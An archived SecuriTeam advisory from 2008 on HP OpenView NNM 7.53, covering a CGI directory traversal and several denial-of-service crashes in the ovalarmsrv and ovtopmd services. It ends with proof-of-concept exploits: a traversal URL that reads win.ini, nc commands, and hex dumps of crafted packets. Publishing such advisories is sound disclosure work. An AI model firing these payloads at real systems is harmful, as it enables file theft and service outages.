Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] HP OpenView NNM Directory Traversal and Multiple Denials of Service

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] HP OpenView NNM Directory Traversal and Multiple Denials of Service
Date: 16 Apr 2008 19:44:56 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  HP OpenView NNM Directory Traversal and Multiple Denials of Service
------------------------------------------------------------------------


SUMMARY

 <http://www.openview.hp.com/products/nnm/> OpenView NNM "automates the 
process of developing a hyper-accurate topology of your physical network, 
virtual network services and the complex relationships between them. It 
then uses that topology as the basis for intelligent root cause analysis 
to enhance network availability and performance." Multiple denial of 
service vulnerabilities as well as directory traversal vulnerability have 
been discovered in HP's OpenView NNM.

DETAILS

Vulnerable Systems:
 * HP OpenView Network Node Manager version 7.53

CGIs directory traversal
The CGIs available in NNM use some instructions which filters malicious 
chars in the parameters passed by the clients, for example to avoid 
directory traversal attacks, XSS and so on.

The path delimiter filtered by these CGIs is the backslash char, so using 
the slash will allow an attacker to download the files from the disk on 
which is installed NNM.

Denial of Service in ovalarmsrv
The ovalarmsrv service listening on port 2954 can be easily freezed with 
CPU at 100% and without the possibility of handling further requests on 
both its ports 2953 and 2954 simply sending an incomplete multi line 
request. In short the last numeric parameters of the requests 25, 45, 46, 
47 and 81 is used to specify how much sub-arguments (one per line) will be 
sent. So ovalarmsrv starts a loop which terminates when all the sub 
arguments are received; closing the connection or not sending all or part 
of these arguments will freeze the entire service. The following are all 
the supported requests and their "sscanf" format:

  REQUEST_CONTRIB_EVENTS  (22): "%d %d %s"
  REQUEST_PRINT           (25): "%d %d %d %d %s"
  REQUEST_DETAILS         (33): "%d %d %s"
  REQUEST_EVENT_DELETE    (35): "%d %d %s"
  REQUEST_EVENT_ACK       (36): "%d %d %s"
  REQUEST_RUN_ACTION      (37): "%d %d %s %s"
  REQUEST_SPECDATA        (41):
  REQUEST_EVENT_UNACK     (44): "%d %d %s"
  REQUEST_SAVE            (45): "%d %d %d %d %s"
  REQUEST_CAT_CHANGE      (46): "%d %d %d %[^\n]"
  REQUEST_SEV_CHANGE      (47): "%d %d %d %[^\n]"
  REQUEST_CONF_ACTIONS    (48): "%d %d\n"
  REQUEST_RESTORE_STATE   (62): "%d %[^\n]"
  REQUEST_SAVE_DIR        (63):
  REQUEST_LOCALE          (66): "%d"
  REQUEST_FORMAT_PRINT    (81): "%d %d %d %d %s"
  REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]"

NULL pointer in ovalarmsrv
The parameter which specifies the amount of sub-arguments described above 
is used to allocate a certain amount of initial dynamic memory (value * 2) 
for storing all the sub-arguments which is then reallocated wheen needed.

Specifying a too big unallocable amount of sub-arguments results in a NULL 
pointer which will crash the service.

Process termination in ovtopmd
The ovtopmd service listening on port 2532 uses a special type of packet 
(0x36) for forcing the termination of the process ("Exiting due to request 
of ovtopmd -k."), so an attacker can use this packet for causing a Denial 
of Service.

Exploits:
For the directory traversal:
http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini

For the denial of services:
  nc SERVER 2954 -v -v -w 2 < closedviewx1.txt
  nc SERVER 2954 -v -v      < closedviewx2.txt
  nc SERVER 2532 -v -v      < closedviewx3.txt

closedviewx1.txt
0000000 3532 3020 3020 3120 2030 6f62 6d6f 000a
000000f

closedviewx2.txt
0000000 3532 3520 3020 3220 3431 3437 3338 3436
0000010 2037 6f62 6d6f 350a 2033 4141 4141 4141
0000020 4141 4141 4141 4141 4141 4141 4141 4141
0000030 4141 4141 4141 4141 4141 4141 4141 000a
000003f

closedviewx3.txt
0000000 0000 0400 0000 3600
0000008


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/closedview_old-adv.txt> 
http://aluigi.altervista.org/adv/closedview_old-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] HP OpenView NNM Directory Traversal and Multiple Denials of Service, SecuriTeam <=
Previous by Date:  [UNIX] libpng Zero-Length Chunks Incorrect Handling, SecuriTeam
Next by Date:  [UNIX] Oracle Application Express Privilege Escalation Vulnerability, SecuriTeam
Previous by Thread:  [UNIX] libpng Zero-Length Chunks Incorrect Handling, SecuriTeam
Next by Thread:  [UNIX] Oracle Application Express Privilege Escalation Vulnerability, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]